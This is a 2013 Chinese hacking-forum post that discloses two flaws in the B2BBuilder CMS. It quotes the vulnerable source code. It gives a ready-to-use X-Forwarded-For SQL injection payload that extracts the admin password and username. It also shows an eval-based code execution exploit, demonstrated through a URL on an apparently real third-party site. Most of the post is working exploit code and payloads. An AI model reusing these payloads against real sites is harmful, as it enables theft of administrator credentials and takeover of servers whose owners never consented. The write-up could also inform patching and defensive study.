【我爱T00LS】B2BBuilder头注入后台任意代码执行

2013-09-23 16:25:46 31 4228


看到小伙伴们都在B2Bbuilder 我也凑个热闹
0x1 头注入

Include/function.php
function getip()

{

if (isset($_SERVER)) {

if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {

   $realip = $_SERVER['HTTP_X_FORWARDED_FOR'];

} elseif (isset($_SERVER['HTTP_CLIENT_IP'])) {

   $realip = $_SERVER['HTTP_CLIENT_IP'];

} else {

   $realip = $_SERVER['REMOTE_ADDR'];

}

} else {

if (getenv("HTTP_X_FORWARDED_FOR")) {

   $realip = getenv( "HTTP_X_FORWARDED_FOR");

} elseif (getenv("HTTP_CLIENT_IP")) {

   $realip = getenv("HTTP_CLIENT_IP");

} else {

   $realip = getenv("REMOTE_ADDR");

}

}

return $realip;

}
明显的头注入。。。。

构造头部测试:
x-forwarded-for:' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,password,user,0x27,0x7e) from b2bbuilder_admin limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1


0x2后台任意代码执行:admin/module_translations.php
if(empty($_POST))

{

$refer_lang = $_GET['code'] =='en'?'cn':'en';        //基本参照语言

$l = $rl = array();echo "start";

@include_once($config['webroot'].'/module/'.$_GET['mod'].'/lang/'.$_GET['code'].'.php');//got milk

@eval('$l =$_LANG_MOD_'.strtoupper($_GET['mod']).';');       

@include_once($config['webroot'].'/module/'.$_GET['mod'].'/lang/'.$refer_lang.'.php');

@eval('$rl =$_LANG_MOD_'.strtoupper($_GET['mod']).';');//got milk
在eval中用;就能分别执行两个命令,访问:http://www.jjgle.com/admin/module_translations.php?mod=;phpinfo()如图

关于作者

newbie008614篇文章307篇回复

评论31次

要评论?请先  登录  或  注册